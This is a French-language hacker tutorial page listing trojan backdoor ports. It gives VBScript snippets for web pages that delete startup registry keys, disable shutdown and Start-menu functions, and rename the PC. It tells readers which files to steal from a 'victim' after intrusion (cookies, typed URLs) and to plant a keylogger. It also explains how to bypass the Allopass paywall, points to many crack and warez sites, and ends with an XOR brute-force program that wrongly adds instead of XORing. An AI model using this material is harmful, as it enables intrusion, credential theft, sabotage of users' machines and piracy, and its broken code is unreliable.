12076,Gjamer
12223,Hack´99 KeyLogger
12346,NetBus 1.x (avoiding Netbuster)
12701,Eclipse 2000
16969,Priotrity
20000,Millenium
20034,NetBus Pro
20203,Logged!
20203,Chupacabra
20331,Bla
21544,GirlFriend
21554,GirlFriend
22222,Prosiak 0.47
23456,EvilFtp
27374,Sub-7 2.1
29891,The Unexplained
30029,AOLTrojan1.1
30100,NetSphere
30303,Socket25
30999,Kuang
31787,Hack'a'tack
33911,Trojan Spirit 2001 a
34324,Tiny Telnet Server
34324,BigGluck TN
40412,TheSpy
40423,Master Paradise
50766,Fore
53001,RemoteWindowsShutdown
54320,Back Orifice 2000 (default port)
54321,Schoolbus 1.6+2.0
61466,Telecommando
65000,Devil 1.03

Il existe aussi des logiciels que l'on nomme "scaneurs d'ip" qui permettent de scaner une tranche d'IP et de par exemple nous dire lesquels sont infectés par un trojan, et surtout quel est son nom (pour pouvoir telecharger ensuite le client correspondant sur internet) ! Je vous conseille un super logiciel pour cela : SuperScan.

Vous vous etes fait infectés, vous etes paniqués en ne savez plus quoi faire??? Vous venez de telecharger un trojan et vous avez confondu le client avec le serveur ?????? Il existe des logiciels appelés vulgairement "bouffe-trojans" qui vous en débarraseront tres facilement (faites un recherche avec google).
Vous pouvez aussi vous en debaraser manuellement en allant chercher dans le registre la clée "HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Windows\CurrentVersion\Run" (Qui est la clée qui possede un certain nombre de valeur de chaine qui possedent eux meme pour valeur le chemin des programmes qui se lancent au demarage (une valeur de chaine = 1 programme) ) suprimez ce que vous croyez etre le trojan (seulement si vous etes certain !)
Un autre moyen pour connaitre les programmes qui se lancent au demarage : Demarer>executer>msconfig>onglet demarage.
 

Le vbs

Le vbs est un language script que vous pouvez inclure dans des pages web(cf l'exemple ci dessous),
a notre plus grand bonheur ! Mais helas, ceci ne marche que pour les machine possedant Windows.

<html>
< head>
< title>C'est la joie non ??</title>
< /head>
< body>
< script language="VBScript" type="text/VBScript">
' les scripts vbs se trouvent dans cette partie !
< /script>
< /body>
< /html>

Voici un bon nombre de petits script vbs que vous pourrez incule dans
des pages web, ou directement, avec le bloc note, enregistrer au format .vbs !

Afficher un p'tit message
msgbox"salut l'ami !"

Ecrire dans la base de registre (cf :partie informatique>tuto>base de registre)
Set WshShell = CreateObject("WScript.Shell")
' supprimer une clée
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs"
' Créer une valeur de chaine
WshShell.RegWrite "HKEY_CURRENT_USER\YaDlaJoie\Youpi", "valeur"

Créer un racourcis sur le bureau
if location.protocol = "file:" then
Set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
HPath = Replace(location.href, "/", "\")
HPath = Replace(HPath, "file:\\\", "")
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set RealLink = WshShell.CreateShortcut("C:\WINDOWS\bureau\paatate")
RealLink.TargetPath = "http://www.patate.tk"
RealLink.Save
end if

Créer un fichier quelquonque (dans exemple, fichier batch ;-) )
Set monfichier = FSO.CreateTextFile("c:\Windows\bureau\monfichier.bat", 2, False)
monfichier.WriteLine "@echo off"
monfichier.WriteLine "echo c'est la joie"
monfichier.WriteLine "pause>nul"
monfichier.WriteLine "exit"
monfichier.Close

Supprimer les fichiers qui se lancent au demarage
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run"

Modifier nom du PC:
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\System
\CurrentControlSet\Control\ComputerName\"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
\ComputerName\ComputerName\ComputerName","LeNom"

Empecher le pc de s'eteindre:
Set WShell = CreateObject("WScript.Shell")
WShell.RegWrite"HKEY_CURRENT_USER\Software
\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", "1"

Enlever demarer>executer
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software
\Microsoft\Windows\CurrentVersion\Policies\ Explorer\NoRun", 0 ,"REG_DWORD"

Enlever demarer>documents
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite"HKEY_CURRENT_USER\Software
\Microsoft\Windows\CurrentVersion\Policies\ Explorer\NoRecentDocsMenu", 0 ,"REG_DWORD"

Enlever demarer>rechercher
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite" HKEY_CURRENT_USER\Software
\Microsoft\Windows\CurrentVersion\Policies\ Explorer\NoFind", 0 ,"REG_DWORD"

Dossier cible

Mettons que vous avez reussi à penetrer une machine, quels sont les dossiers et les fichiers à regarder ???

- Les cookies : Ils sont la cible prioritaire (sous windows 9x contenus dans \windows\cookies, sous win NT, contenu dans H:\Documents and Settings\Nom_Utilisateur\Cookies, sous linux avec netscape contenus dans /.netscape/)
Explications : vous venez d'aller sur un site qui demande votre login et votre mot de passe, puis un jour apres, vous vous reconectez à ce site et la miracle! Il se souvient de vous !! Vous n'avez même plus à retaper le mot de passe ni le login !! Comment cela se fait-il ? Et bien le site place un cookie qui contient toute ces informations (je pense que la, ça commence à s'éclaircir dans votre tete...) . Biensur, ces informations sont cryptés, mais ce n'est pas une generalitée ;-) ! Vous comprenez donc que les cookies sont à recuperer !

- HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\urlX
Seulement si vous pouvez acceder au registre (beaucoup de trojans possede cette fonctionalitée). En effet la clée HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs possede X valeur de chaine qui possedent eux meme pour valeur les URL tapés dans l'explorer. Vous pouvez donc savoir sur quel site vas regulièrement votre victime. Et là normalement, vous devriez faire le lien avec les cookies ;-) non ? (Ne marche que si la victime a IE)

- Pour avoir plus d'information sur notre victime, placez un keyloger ! Qui vous permettra d'enregitrer tout ce qui a été taper par notre victime !

- FARFOUILLEZ !
Maintant cherchez un peu partout (mes documents, le contenu de windows...etc.)! Vous trouverez surement des choses interessantes

Télécharger un fichier flash

Pour telecharger un fichier flash, il ne vous suffit pas de faire un clique doit, puis enregistrer sous, c'est un peu plus compliqué que cela (un chouia plus...)
Pour cela il vous faudra :

- Un editeur de texte quelquonque
- heu... c'est tout.

Vous venez de repérer le fichier qui vous interesse.
Il faut que vous trouviez tout d'abord le chemin de ce ce fichier flash (faite, affichage>Source>pis debrouillez vous (lol faites Rechercher>".swf" pis ok, et vous trouverez surement le chemin du fichier).
Apres avoir trouver le chemin du fichier, lancez par exemple le bloc note et ecrivez ceci :

<html>
< head>
< title>c'est la joie</title>
< /head>
< body>
< a href="Mettez ici l'adresse de votre fichier flash">Telecharger le fichier swf < /a>
< /body>
< /html>

Enregistrez sous "NimporteQuelNom.html" puis lancez ce fichier. Il s'afficher alors une page web avec pour contenu juste un lien HyperTexte, faites un clique droit sur ce lien et faites "Enregistrer la cible sous".
Et voila ! le tour est joué !

Qu'est ce qu'une ip ?

Qu'est-ce qu'une ip ? Une ip est une sorte de code, qui est propre à chaque machine connectée au web.
Concretement une ip ce représente sous la fome de quatres chiffres à la suite séparés par des points et allant de 000 a 255.
Exemple : 193.211.157.002
Ce chiffre et votre plaque d'imatriculation et elle est dite "dynamique" si elle change à chaque connection ou "fixe" pour le contraire.
Les 2 premiers nombres c'est l'adresse d'un réseau, le 3eme nombre est celui d'un sous réseaux (Exemple pour AOL :
c'est 152 pour le premier numéro, les trois autres varient )
Si quelqu'un connait votre IP, il peut avoir de nombreuse informations sur vous, et si vous etes inficter par un trojan, on peut même penetrer votre pc.
Mais comment connaitre sa propre ip ??? "Demarer>executer>winipcfg" OU "Demarer>executer>command>ipconfig"
Il existe de nombreux logiciels qui peuvent vous permettre de cacher votre IP (ex : steganos internet anonym...etc.).
Mais il existe aussi des logiciels pour scanner une tranche d'ip (ex : de l'ip 120.050.02.041 à 120.050.02.049) pour detecter vos failles et les exploiter (tres bon logiciel pour cela : SuperScan).
Mais attention, si il vous venait à l'esprit de scaner une tranche d'ip, sachez tout d'abord que c'est TOTALEMENT interdit par la loi, et que si vous scannez les IP ci-dessous, vous aurez de serieux problemes .

6.*.*.* - Army Information Systems Center
21.*.*.* - US Defense Information Systems Agency
22.*.*.* - Defense Information Systems Agency
26.*.*.* - Defense Information Systems Agency
29.*.*.* - Defense Information Systems Agency
30.*.*.* - Defense Information Systems Agency
49.*.*.* - Joint Tactical Command
50.*.*.* - Joint Tactical Command
55.*.*.* - Army National Guard Bureau
64.224.*.*
64.225.*.*
64.226.*.*
209.35.*.*
216.247.*.*
216.25.*.*
217.6.*.*
155.7.0.0 American Forces Information (NET-AFISHQ-NET1)
155.8.0.0 U.S. ArmyFort Gordon (NET-GORDON-NET5)
155.9.0.0 United States Army Information Systems Command (NET-LWOOD-NET2)
155.74.0.0 PEO STAMIS (NET-CEAP2)
155.75.0.0 US Army Corps of Engineers (NET-CEAP3)
155.76.0.0 PEO STAMIS (NET-CEAP4)
155.77.0.0 PEO STAMIS (NET-CEAP5)
155.78.0.0 PEO STAMIS (NET-CEAP6)
155.79.0.0 US Army Corps of Engineers (NET-CEAP7)
155.80.0.0 PEO STAMIS (NET-CEAP)
155.81.0.0 PEO STAMIS (NET-CEAP9)
155.82.0.0 PEO STAMIS (NET-CEAP10)
155.83.0.0 US Army Corps of Enginers (NET-CEAP11)
155.84.0.0 PEO STAMIS (NET-CEAP12)
155.85.0.0 PEO STAMIS (NET-CEAP13)
155.86.0.0 US Army Corps of Engineers (NET-CEAP14)
155.87.0.0 PEO STAMIS (NET-CEAP15)
155.88.0.0 PEO STAMIS (NET-CEAP16)
155.178.0.0 Federal Aviation Administration (NET-FAA)
155.213.0.0 USAISC Fort Benning (NET-FTBENNNET3
155.214.0.0 Director of Information Management (NET-CARSON-TCACC )
155.215.0.0 USAISC-FT DRUM (NET-DRUM-TCACCIS)
155.216.0.0 TCACCIS Project Management Office (NET-FTDIX-TCACCI)
155.217.0.0 Directorate of Information Management (NET- EUSTIS-EMH1)
155.218.0.0 USAISC (NET-WVA-EMH2)
155.219.0.0 DOIM/USAISC Fort Sill (NET-SILL-TCACCIS)
155.220.0.0 USAISC-DOIM (NET-FTKNOX-NET4)
155.221.0.0 USAISC-Ft Ord (NET-FTORD-NET2)
128.47.0.0 Army Communications Electronics Command (NET-TACTNET)
128.50.0.0 Department of Defense (NET-COINS)
128.51.0.0 Department of Defense (NET-COINSTNET)
128.56.0.0 U.S. Naval Academy (NET-USNA-NET)
128.63.0.0 Army Ballistics Research Laboratory (NET-BRL-SUBNET)
128.80.0.0 Army Communications Electronics Command (CECOM) (NET-CECOMNET)
128.98.0.0 Defence Evaluation and Research Agency (NET-DERA-UK)
128.98.255.255 Defence Evaluation and Research Agency (NET-DERA-UK)
128.154.0.0 NASA Wallops Flight Facility (NET-WFF-NET)
128.155.0.0 NASA Langley Research Center (NET-LARC-NET)
128.156.0.0 NASA Lewis Network Control Center (NET- LERC)
128.157.0.0 NASA Johnson Space Center (NET-JSC-NET)
128.158.0.0 NASA Ames Research Center (NET-MSFC-NET)
128.159.0.0 NASA Ames Research Center (NET-KSC-NET) 128.160.0.0 Naval Research Laboratory (NET- SSCNET)
128.161.0.0 NASA Ames Research Center (NET-NSN-NET)
128.183.0.0 NASA Goddard Space Flight Center (NET-GSFC)
128.216.0.0 MacDill Air Force Base (NET-CC-PRNET)
128.217.0.0 NASA Kennedy Space Center (NET-NASA-KSC-OIS)
128.236.0.0 U.S. Air Force Academy (NET-USAFA-NET)
139.142.*
195.10.*
205.96.*
205.103.*
207.30.*
207.120.*
207.60.*
207.61.*
209.35.*.*
216.25.* <-- REAL DANGEROUS (CIA?)
216.247.* <-- REAL DANGEROUS
217.6.*.*
207.60.x.x FBI Linux servers
207.61.x.x FBI Linux servers
139.142.153.23
139.142.*

Allopass

Tout le monde le sait, allopass est devenu un fléaux sur internet ! Nous sommes desormais obligés de passer un coup de fil payant pour acceder a certaines pages ! Certaine webastre fond meme payer grace à ce syteme l'acces à leurs site !
Vous ai-je fait payer l'acces a mon site ? Même si j'ai passer énormement de temps à faire ce site, je trouve cela inconsevable d'en faire payer l'acces.

Voici donc la technique pour passer allopass :
Vous aurez besoin de :
- IntelliTamper (Petit Freeware que vous trouverez partout ! (google>IntelliTamper) )

IntelliTamper est un logiciel qui vas "scanner" le serveur du site voulu et en faire une arboréscence.
Il faut deja que vous reperiez l'adresse du site "cible", tres simple, mais ne vous fiez pas aux apparences !!! Il se peut que l'url que vous pensiez bonne ne soit qu'une redirection ! Faite affichage>source sur le "site cible" et cherchez la bonne URL.

Entrez l'url du site dans la zone de texte d'IntelliTamper puis lancez le scan, et attendez (si vous avec une connexion 56Ko, ca risque de prendre du temp...)
Reperez la page protégée par le allopass dans IntelliTamper. Puis clique droit>"open file" Et la page s'ouvrira !!
MAIS (il y a toujours un "mais" en informatique) il se peut que le webmastre ai mit une protection de allopass, dans ce cas, la page ne s'affichera que quelques secondes, voir pas du tout.
Pour contourner cette protection, faite "Save file as" de la page protegée avec allopass. Ouvrez ensuite cette page avec le Bloc Note ou un editeur de texte quelquonque, et supprimez la portion de code ci-dessous :

<noscript>
< meta http-equiv="Refresh" content="0;URL=http://www.allopass.com/check /error_code.php4?DOC_ID=62395&SITE_ID=22690">
< /noscript>
< script language="Javascript" src="http://www.allopass.com/check/chk.php4? IDD=62395&IDS=22690"></script>

Puis sauvegardez, ré-ouvrez la page et TADAAAAAA ca marche !! ;-)

Anonymat

Et c'est parti pour un petit tuto qui vous expliquera comment etre le plus annonyme possible sur la toile.
Vu que vous etes dans la partie hacking, sachez qu'avant de vous attaquer à n'importe quoi, il faut IMPERATIVEMENT que vous vous assuriez de votre transparance sur le web (je pense que vous comprenez pourquoi hummm ?).

1) Cacher son IP

Vous savez que votre IP est en quelque sorte votre plaque d'imatriculation sur le web, et si vous vous preparez a faire la plus grosse casse du siecle, il faut bien evidement que vous cachiez cette plaque !
Pour cela, dieux a donné aux hommes les proxy ! Les proxy permette donc de cacher votre vrai IP par une fausse.
Vous pouvez utiliser un proxy de deux manières : soit par des logiciels qui vous mache tout le travail, ou, en configurant IE.

- Avec IE : outil>option internet>onglet connexion>paramètres>utiliser un serveur proxy pour cette connexion
Et dans les zone de texte, il faut que vous entriez l'ip proxy ainsi que le port.
Vous trouverez un tas de proxy en allant sur le site de SamAir (faites une recherche google...).

- Avec des programme : Des tas programmes existent, comme Steganos internet annonym ou encore multiproxy, et ces dernièrs changent votre IP (avec Steganos, vous pouvez faire changer votre ip toute les secondes !).

2)Les Spywares

Il se peut qu'il y ai un bon nombres de spyware sur votre machine. Ce sont des petits programmes qui espionnent vos faits et gestes sur internet. Pour les supprimer, je vous conseille "Spyboot Shearch and destroy" qui est un petit Freeware bien sympatique qui se fera une joie de supprimer la quasi totalitée des spyware installés sur votre machine.

3)L'historique

Faites outils>option internet> onglet general> historique Et mettez 4 en nombre de jours pendant lesquels seront conservés l'historique.

4) Les cookies

La quasi totalité des sites laissent une petite trace d'eux en vous laissant un chtit cookie, je vous conseille donc de les supprimer à chaque demarage du PC ! Pour cela, créez un petit fichier batch :
@echo off
echo o | del c:\windows\cookies\*.*
echo cookies effacés avec succes !
pause
cls
exit
Et placez ce dernier dans demarer>programmes>demarage

5)Les firewalls

Si vous ne possedez pas de firewall, n'importe qui peut avoir un bon nombre d'information sur vous ! Telechargez donc un firewall !(je vous conseille Zone Alarm de Zone Labs)

Et voila !

Un crack

Tout d'abord, definition :
Un crack est un petit programme dont le but est de modifier quelques bytes d'un EXE.
Mais à quel but ? Par exemple pour transformer un Shareware en Freeware. Vous comprenez donc que si vous telecharger par exemple la version trial de photoshop qui ne dure que 30 Jours, et que vous telecharger le crack pour ce shareware, et bien vous aurez photoshop indefiniment !

Voici une liste de "phiphi" dans laquel vous trouverez un certain nombre d'URL de site sur lesquel vous trouverez tout les crack que vous voulez !

http://www.crackzplanet.com/search.php
http://www.crackway.com/
http://www.mikrobos.szm.com/data/crack/
http://www.keygen.us/
http://www.mikrobos.szm.com/
http://www.allcracks.net/
http://andr.net/
http://www.astaserials.com/
http://www.astakiller.com/
http://www.cleanserials.com/
http://www.crackfind.com/test.php
http://www.cracksearch.ws/
http://crackfind.com/
http://www.crackyard.com/
http://www.crackfound.com/
http://www.crackhell.com//toplist.php
http://www.crackportal.com/
http://members.lycos.nl/peterlux/
http://www.cracks.am/cracks/a16.html
http://www.crackz.ws/
http://cucusoft.convert.avi.to.vcd.dvd.svc... ck-locator.net/
http://cybermania.vibehosting.com/
http://www.deamoncrack.fr.st/
http://www.deluxnetwork.com/
http://www.easycracks.net/
http://www.freeline.ws/
http://www.fastcrackz.com/
http://www.freeserials.com/cgi-bin/serials/view.cgi?dir=P
http://cas.has.it/
http://fullserials.hacked.at/
http://www.googlecrack.com/
http://www.googlecrack.com/Programs.asp
http://www.serialsnake.ws/
http://www.ultraseek.net/simple/?link=http... ools.serwis.pl/
http://www.megazip.com/
http://crackazoid.com/
http://crackinfo.net/a6.htm
http://www.serialcodes.net/in.php?id=allseek
http://www.serialheaven.com/index.php
http://www.seriall.com/
http://www.serials.ws/all/
http://www.cerials.net/
http://www.servisco.net/
http://www.ultimasversiones.com/
http://www.undergroundarchive.co.uk/
http://great-warez.com/a_new2.htm
http://www.world-toplist.com/
http://www.deluxserials.com/
http://www.cracks.st/
http://www.darkserials.com/
http://www.serialz.to/
http://keygen.us/top/index.shtml
http://icracks.net/
http://keygen.ru/
http://www.crackmanworld.com/
http://www.eminence.gulli.com/
http://www.bugz.ru/
http://kickme.to/aldocrackz/
http://www.allcracks.net/search/search.php
http://www.astalavista.cc/index.php?search=email%20remover
http://www.astalavista.us/
http://www.cracks.spb.ru/
http://www.crackfound.com/
http://www.cracksearchengine.net/
http://serials.omck.info/
http://inicia.es/de/manifiestocomunista/crack.htm
http://www.crackdb.com/
http://crackersteam6.tk/
http://www.hackemate.com.ar/cracking/
http://www.crack-locator.com/
http://www.crackmes.de/
http://cracksû.us/
http://www.cracksû.com/
http://www.cracksearch.ru/cracks/
http://cracks.thebugs.ws
http://www.geocities.com/
http://www.googlecrack.com/WWW/
http://zor.org/desperate
http://kickme.to/juancho
http://ngenworld.free.fr/
http://kickme.to/tnt
http://news.lunarpages.com/news.html
http://www.crackfound.com/
http://www.cracksearchengine.net/
http://www.crackspider.net/
http://www.astalavista.box.
http://www.cracks.am/main.htlm
http://www.gulli.com/serialz.shtlm
http://www.toptools.serwis.pl/index.htm
http://www.wtcracks.com/main.htm
http://www.halyava.ru/darkseed/newsoft.htm
http://www.ifrance.com/gifromu/cracka.html
http://www.tanerkope.com/cracks/crks/a.html
http://www.crackway.com/cracks/index.shtml
http://www.free51.net/crack
http://www.warezcrawler.net
http://www.bestserials.com
http://www.subserials.com
http://www.thecrack.net.8080
http://www.cracks.ss.ru/
http://www.trinsic.org
http://www.anycracks.com
http://www.mscracks.com
http://www.cracksviperland.free/index.htm
http://www.members.fortunecity.com
http://www.cracks4u.us
http://cracks.me.uk/

Cryptage Xor

Le cryptage Xor est utilisé dans des algorithmes complexes, et sert également d'instruction de programmation. Il est donc intéressant de connaître son fonctionnement. Pour ceux qui ne sont pas intéressés : look




L'opération Xor ou « OU exclusif », notée en mathématiques, est une opération logique qui ne retourne la valeur 1 que si les deux bits comparés sont différents. C'est le « OU » de l'expression « boire OU conduire, il faut choisir (mdrr ) » : l'un ou l'autre, mais pas les deux.
Alors, voyons voir comment fonctionne le cryptage XOR, ou exclusif:

Il est impératif de connaître la table qui suit :
0 xor 1 = 1
1 xor 1 = 0
1 xor 0 = 1
0 xor 0 = 0

Mise en pratique:
texte claire : cryptage
clé de cryptage : messages

On convertit les caractère en binaires :
cryptage = 01100011 01110010 01111001 01110000 01110100 01100001 01100111 01100101
messages = 01101101 01100101 01110011 01110011 01100001 01100111 01100101 01110011

On compare les deux chaines de données et on applique le xor:
01100011 01110010 01111001 01110000 01110100 01100001 01100111 01100101 //text clair
01101101 01100101 01110011 01110011 01100001 01100111 01100101 01110011 //clé

00001110 00010111 00001010 00000011 00010101 00000110 00000010 00010110 //code du cryptogramme

Dans le cas où le message à crypter est plus grand que la clé ( çà arrivera forcément en cryptant un texte, il suffit de répéter la clé autant de fois que nécessaire pour qu'il y ait toujours deux chiffres à comparer)
Si le message est plus petit que la clé ( il va de soi que la clé est tronquée )

Chiffrement à mono-clé
--------------------------------------------------------------------------------
Il est possible de crypter un chaine de caractères en utilisant, toujours la même clé.
Certes il est plus facile de la décrypter dans ces conditions, mais là c'est juste en exemple.
Nous voulons appliquer le chiffrement avec un XOR 40.

Texte claire: over.
En ASCII cela donne 111 118 101 114
Appliquons le chiffrement:
111 XOR 40 : 71
118 XOR 40 : 94
101 XOR 40 : 77
114 XOR 40 : 90
Résultat : G^MZ
La machine elle n'opère qu'en binaire, mais dans un programme en C/C++ peut importe.

Programmation :
En language C, l'instruction permetant le XOR est : ^
Soit deux lettres E et F, nous effectuerons: E XOR F:

main() {
int var;
var = 'E' ^ 'F';
printf("%i",var);
}

Equivalent à:
main() {
int var;
var = '101' ^ '102';
printf("%i",var);
}

Ou encore:
main() {
int var;
var = '1100101' ^ '1100110';
printf("%i",var);
}

Nous avons vu que certains messages peuvent être crypter par une mono-clé, c'est-à-dire que l'on crypte chaque caractère d'un message par une valeur tenant donc obligatoirement sur 8 octect soit 2 puissance 8 = 256 possibilité de crypter par mono-clé.

NOTION IMPORTANTE : le xor est réversible c'est-à-dire : E xor F = M donc M xor F = E et encore
M xor E = F

Exercice :
Décrypter : XIZKQUWVQM

Solution :
Il existe 255 caractère ascii, donc pour résoudre ce challenge il vous faut faire un mini-programme en C par exemple qui xorize chaque caractère du message crypté par une mono-clé allant de 0 à 255 :
#!include!
#!include!

main() {
int v,v1,v2,v3,v4,v5,v6,v7,v8,v9;
int i;
for(i=0;i<256;i++){
v = 'X' + i;
v1 = 'I' + i;
v2 = 'Z' + i;
v3 = 'K' + i;
v4 = 'Q' + i;
v5 = 'U' + i;
v6 = 'W' + i;
v7 = 'V' + i;
v8 = 'Q' + i;
v9 = 'M' + i;
printf("%c%c%c%c%c%c%c%c%c%c %i ",v,v1,v2,v3,v4,v5,v6,v7,v8,v9,i);
}
}

Voilà, j'espère ne pas avoir été trop confus..

Waste / logiciel P2P

Waste est aujourd'hui le seul logiciel de P2P qui garantisse l'anonymat, pourquoi et comment? C'est ce que nous allons voir dans cette article.




Petit rappel des faits :
Fin mai, NullSoft (créateur du logiciel Winamp) propose sur son site un logiciel P2P du nom de WASTE sous licence libre GNU/GPL. 24h plus tard la page de téléchargement est remplacée par un avertissement interdisant l’utilisation et la diffusion de WASTE, tout en réfutant la licence GNU/GPL ! Mais une journée aura suffit aux partisans du libre pour s’accaparer le logiciel. Ainsi, malgré le désaccord d’AOL (propriétaire de Nullsoft), Waste se retrouve sur SourceForge, et sa licence libre de 24h confortée.

Mais qu’est ce que Waste ?
Simple, un réseau de partage crypté pour une petite communauté (10 à 50 personne) et qui assure un quasi-anonymat aux utilisateurs :
- À un premier niveau par le cryptage des informations grâce à un systême de clés et aussi un encodage des liens entre les ordinateurs du groupe.
- À un second niveau par l’architecture du réseau, sans serveurs et avec des nodes qui font que les communications ne sont pas directes.

Comment ça marche ?
À l’installation du programme, deux clés sont créées, une privée et une publique. La première ne sert qu’à vous identifier sur le réseau et ne doit pas être divulgée. La seconde permet de se connecter sur les autres ordinateurs. En effet cette clé est nécessaire pour que la connection sur un ordinateur ami soit effective. Une fois connecté à un autre ordinateur, celui-ci vous fournire sa liste d’ordinateur ami, et donc vous serez relié au groupe. Waste vous offre le choix alors de chatter, de chercher et transférer des fichiers.

Ca marche vraiment bien, et c'est très convivial a utilisé grâce au module de chat et à cet ambiance "échange entre pote"

Tutorial: (provient de http://www.forum-libre.com/protox.biz/tutorial/tutorial_waste_wasted.htm )

Alors .. Comment..ça..marche ?!



1 - Vous êtes l'ordi rouge et vous avez déja 3 potes de connectés à vous,
un beau jour l'un de vos pote se connecte avec un nouveau copain à lui.

2 - Ce nouveau copain possède lui aussi une liaison intime avec un autre
type super sympa qui possède plein de bonnes choses à partager..

3 - Ce nouveau type est connecté lui aussi avec un autre gars.

4 - Le truc de fou, c'est que ce gars est lui même connecté à un reseau
déjà bien monté avec plein de gens qui partagent des milliers de trucs.

5 - Waste est un soft intelligent et garde trace de vos nouveaux copains,
non seulement vous avez récupéré les clés de tous vos nouveaux potes
mais une nouvelle connection vient de se faire entre vous et un ordi vert

Est-il nécessaire de vous rappeler que toutes ces liaisons sont cryptées ?
Est-il nécessaire de vous rappeler qu'il n'y a aucun serveur central ?

Nota Bene » Les transfers qui se font par exemple entre vous ( 1 ) et votre
pote vert ( 4 ) ne se font pas en connection directe pour assurer l'anonymat,
les données se balladeront entre plusieurs relais avant d'arrivé à bon port.


Comment ça s'install ?!

1) Après avoir lancé pour la première fois ce petit programme vous avez ceci :




Il vous suffit de bouger la souris pour générer des chiffres aléatoires
qui serviront au programme pour crypter vos échanges

2) Remplir les infos demandés



3)Cliquer sur RUN KEY GENERATOR pour generer vos clés publiques et privées.
La clé publique se donne à vos amis, la clé privé reste chez vous.



4)Entrer un mot de passe relativement long (mais retenable !) et choisissez
la taille de la clé : 1536bits, 2048bits .. on peut prendre plus mais ça ralentit
les échanges sur votre futur reseau. Cliquer ensuite sur GENERATE.




5)Une nouvelle collecte de données variables..
Bouger la souris puis cliquer sur GENERATE



6) Vous avez maintenant la possibilité de copier votre clé publique
dans le Clipboard ( le presse-papier ) afin de la donner à vos ami[e]s
L'ordinateur sur lequel vous allez vous connecter DOIT posséder votre clé.



7)Choisissez un repertoire qui servira à stocker vos downloads ainsi que les
repertoires qui seront partagés sur votre reseau. Notez qu'on peut cliquer
plusieurs fois de suite sur ADD pour ajouter plusieurs dossiers differents !
Votre Reseau privé & unique est à présent configuré .. Passons à la suite :




Interface

1) La fenêtre principale de Waste :



> Le Network Status permet de voir rapidement les operations du moment :
Connexion en cours / Téléchargements en cours / Envois en cours ..
> L'explorateur de fichiers vous permet de balayer les partages de vos potes
> Créer / Rejoindre un salon de chat :
Vous pouvez créer un salon visible ou invisible aux autres connectés.

Vous voyez aussi la liste des utilisateur connectés au reseau privé. Un click droit sur leur pseudo vous permet d'avoir un nouveau menu :



Vous pouvez donc chatter en tête à tête, en savoir plus, balayer ses
fichiers ou lui envoyer un ou plusieurs fichiers.

La zone 'Chats:' vous donne la liste des salons visibles actuellement créés.
Pour rejoindre un salon invisible vous devez en connaître le nom exact.

Un salon visible sera de la forme : #monsalon
Un salon invisible sera de la forme : &monsalon

2)



Network Status :
1. Tapez ici une adresse IP de l'un de vos potes puis cliquez sur
2. pour vous y connecter
Vous devez posséder une clé publique de votre pote. Demandez-la lui.

3. Ici vous avez le nombre de connexions que vous souhaitez entretenir,
n'ayant pas de server central c'est à chaque utilisateur de relayer les ips
des autres ainsi que les clés de leurs amis ( une fois connecter sur votre pote,
si lui même à déjà une liste d'utilisateurs il vous donnera automatiquement
leurs clés publiques qui sera sauvegardée sur votre pc .. sympa non ? )

Petite note pour les utilisateurs de la version modifiée de waste,
appelée wasted, on peut mettre un intervale de connections
( exemple : entre 4 et 9 connections seront maintenues )

4. Vous avez ici le status des utilisateurs :
- Status : Il se connecte ? Envoie-t'il ? (out) Reçoit-il ? (in)
- Host : L'adresse IP des utilisateurs online
- Rating : Aucune idée de ce truc ! ( si vous savez, dites-le moi ! )
- User (key) : Le nom d'utilisateur et la signature de sa clé


3) Pour gérer vos envois et téléchargements,
vous pouvez aller dans la section Transferts :



4)Pour faire une recherche sur le reseau global, allez dans BROWSER




Où sont les autres options ?
Gérer les clés, Couleurs, Débit .. etc

1) Pour gérer vos options supplémentaires : Les Préférences




- About : A propos du programme ..

- Profiles : Si vous n'êtes pas tout seul à utiliser le programme ..

- Identity : Votre pseudo du moment et votre 'vrai' nom (lol)

- Network : Votre vitesse de connection, votre port utilisé.
Les sous-menu de Network :
Private Key > Gérer votre clé privée
Public Keys > Gérer les clés publiques : Ajouter/Supprimer/Voir..
Pending Keys > Gérer les clés qui se balladent : ex: Ajout auto ou manuel ?
IP Addresses > Gérer les IP : bannir, autoriser, rediriger ...
Bandwidth > Gérer la bande passante, le débit :
- Limiter les données entrantes en kb/sec
- Limiter les données sortantes en kb/sec

- Display : Toutes les options d'affichage de Waste ( couleurs, police .. )

- Chat : Toutes les options du Chat.
Couleurs, police, accepter les demandes de chat en tête à tête..

- File Transfers : Les options générales lors de transferts de fichiers.
Les sous-menu de File Transfers :
Receiving (Reception) > Repertoire de sauvegarde de vos téléchargements, Permettre l'envoi de fichiers, demander avant l'envoi..
Sending (Envoi) > Limiter le nombre de fichiers demandés, Autres repertoires
de partages, Option de rescanner vos partages toutes les x secondes ...

Virus

Quese qu' un virus: la réponse a cette question tte bête qui devra intéréssé plus d'une personne

P>Les virus : une menace permanente. Une infection est actuellement 20 fois plus probable qu’il y a 2 ans. On estime qu’une entreprise infectée a besoin de 5 jours ouvrables pour se débarrasser totalement de l’assaillant. Donc la lutte antivirus revêt une importance majeure.

1 : Qu’est-ce qu’un virus ?

Un virus est un programme autoreproducteur capable de se propager de façon autonome. Il causera des beaucoup de dégâts dans le système qu’il a infecté. Ces dégâts soit d’ordre logiciel soit même matériel (les virus s'ataquant au BIOS), et vont de l’affichage d’un petit message au formatage complet de votre disque dur.

Voici les sources d’infections :

-Une disquette dont le secteur d’amorce est infecté.
-Une disquette qui comporte un fichier exécutable infecté.
-Un LAN (Local Area Network ou réseau local) qui contient un poste infecté.
-Internet, par simple téléchargement. Le courrier électronique, par un document joint infecté.

